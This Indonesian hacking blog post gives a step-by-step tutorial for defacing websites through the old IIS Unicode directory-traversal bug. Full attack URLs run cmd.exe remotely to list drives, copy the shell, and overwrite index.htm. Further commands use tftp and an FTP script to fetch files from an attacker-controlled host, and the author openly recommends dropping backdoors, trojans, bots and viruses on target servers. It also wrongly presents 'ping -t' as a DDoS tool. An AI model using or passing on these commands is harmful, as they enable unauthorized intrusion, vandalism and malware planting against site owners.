• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "deface melalui CmD / Teknik Hacking dengan CMD"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeHackingVulnwebsitedeface melalui CmD / Teknik Hacking dengan CMD
    deface melalui CmD / Teknik Hacking dengan CMD

    deface melalui CmD / Teknik Hacking dengan CMD

    Simpan Postingan
    Teknik Hacking dengan CMD

    T
    r
    i
    m
    k
    a
    s
    i
    h

    Keluarga Qu T.I Sniper




    Jangan keliru dengan judulnya :D , yang saya maksud di sini yaitu pemanfaatan cmd untuk membantu Hacker melakukan aksinya. Berikut beberapa perintah cmd yang sering digunakan oleh hacker:



    1. Ping
    Perintah ping biasanya digunakan untuk mengetahui ip address target, atau bisa digunakan untuk mengecek apakah koneksi ke target berhasil atau tidak.
    Untuk menjalankan ping, ketik aja “ping target”

    2. Ping –t
    Perintah ini biasanya digunakan untuk melakukan DDOS ke target. Perintahnya “ping target –t”. Perintah ini memungkinkan kita mengirimkan paket secara terus menerus. Untuk menghentikannya, tekan CTRL+C.

    3. Tracert
    Digunakan untuk mencari jalur/router yang dilewati paket yang dikirim ke target. Perintahnya “tracert target”

    4. telnet
    telnet berguna untuk masuk ke sistem, yang menjalankan service telnet. Untuk menggunakan telnet di windows kita harus menginstal dulu telnet client di windows. Untuk menggunakan telnet ketikkan “telnet target”

    5. FTP
    Sama seperti Telnet, tapi FTP biasanya untuk upload dan download file, dll. FTP dan telnet server menjadi sasaran empuk jika pengamanannya lemah.

    6. Net View
    Ketik net view kalo terkoneksi jaringan, nanti kelihatan siapa2 yang terkoneksi ke jaringan.


    7. Masih banyak lagi yang digunakan, untuk saat ini cukup itu dulu.



    =============================================


    O
    k
    e
    h
    deface melalui CmD


    1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh–>> www.target.com

    2. Login
    Ini Merupakan Directory yang Ada Di Web Site Tersebut
    Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
    ada beberapa contoh login diantaranya :
    a)/_vti_bin
    b)/_vti_cnf
    c)/cgi-bin
    d)/scripts
    e)/msadc

    3. Unicode —>> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
    hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
    a) ..%c1%1c..
    b) ..%c0%9v..
    c) ..%c0%af..
    d) ..%c0%qf..
    e) ..%c1%8s..
    f) ..%e0%80%af..
    g) ..%c1%9c..
    h) ..%c1%pc..

    4. OS target –>>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
    0xB5 ISO 8859-1
    0xC5 ISO 8859-1
    0xEA CP437
    0×2140 JIS X 0208
    0×22 ISO 8859-1

    5. Cara Kerja
    Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
    A.) Deface WebSite Perintah Echo

    a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

    Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
    Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
    command dir yang kita lakukan di Dos Prompt
    Directory of c:
    10/05/2001 19:56 Programs Files
    10/05/2001 19:56 Inetpub
    08/05/2001 10:23 230 cmd.exe
    24/04/2001 04:33 4.620 1home.htm
    05/10/2000 12:40 668 about.htm
    10/05/2001 19:54 AboutUs
    11/05/2001 10:28 131 about_us.htm
    28/10/2000 14:49 4.911 about_us.old.htm

    b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set

    maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam – Macam, Yang Perlu dilihat cuma:
    Path_Translated=d:\inetpub\wwwroot

    c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

    /c+dir+c: menjadi /c+copy+c:

    lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

    sehingga kita dapatkan :
    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe

    sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
    Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

    d.) Cari halaman index ke www.target.com/blah.ida
    Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
    Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm

    sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
    dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

    e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
    hanya orang – orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak

    f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
    untuk tidak merusak web nya kita tulis dengan nama file baru
    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm

    /c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

    c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

    Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
    /c+echo”
    This Web Site Hacking BY ….:::J.A.N.G.K.|.K:…
    Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
    “+>+c:inepubwwwrootindex.htm
    /c+echo”
    This Web Site Hacking BY ….:::J.A.N.G.K.|.K:…
    Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
    “+>+c:inepubwwwrootjangkrik.htm
    keterangan :
    %3d adalah pernyataan tanda =
    %22 adalah Pernyataan tanda ”
    %23 adalah pernyataan tanda #
    Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

    g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah ‘type’ :

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
    Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm

    Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

    B.) Deface WebSite Dengan Cara tftp

    Deface nya dilakukan dengan meng-upload file lewat TFTP32
    Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
    Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
    Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
    mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

    a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
    sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
    langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
    Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

    b.)Kita liat lagi apa yg terjadi di IE kita.

    CGI Error
    The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

    Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

    Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

    C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

    Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

    selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

    a.) Setelah kita menemukan vulnernya
    http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
    Directory of c:
    10/05/2001 19:56
    Programs Files
    10/05/2001 19:56
    Inetpub
    08/05/2001 10:23 230 cmd.exe
    24/04/2001 04:33 4.620 1home.htm
    05/10/2000 12:40 668 about.htm
    10/05/2001 19:54
    AboutUs
    11/05/2001 10:28 131 about_us.htm
    28/10/2000 14:49 4.911 about_us.old.htm

    b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) —->>tujuan nya memendekkan command unicode nya

    c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
    http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

    Kira Nya path nya di c:inetpubwwwroot

    d.)Langkah Selanjutnya Yaitu kita membuat script ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
    - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

    Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
    http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

    Setelah selesai script tuh kita jalan kan lagi script nya:
    http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

    buka ie satulagi untuk liat file nya dah smapai belum
    http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
    Kalau dah terkirim selamat dah

    Keterangan nya :
    Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
    open geocities.com —>>> scriptnya —>> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
    jangkrik —>> user name —>>> scriptnya –>> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
    anuamakang —>>> password —>>> scriptnya –>> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
    lcd c:inetpubwwwroot —>>> folder tujuan —>>> scriptnya –>>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
    ascii —>>> bentuk file —>>> scripnya —>>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
    get jangkrik.htm —->>> command tranfer file —>>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
    close —>> perintah dc ke web server —->>> scripnya —>>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

    hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh……….


    untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary.

    Hacking Vuln website
    September 12, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan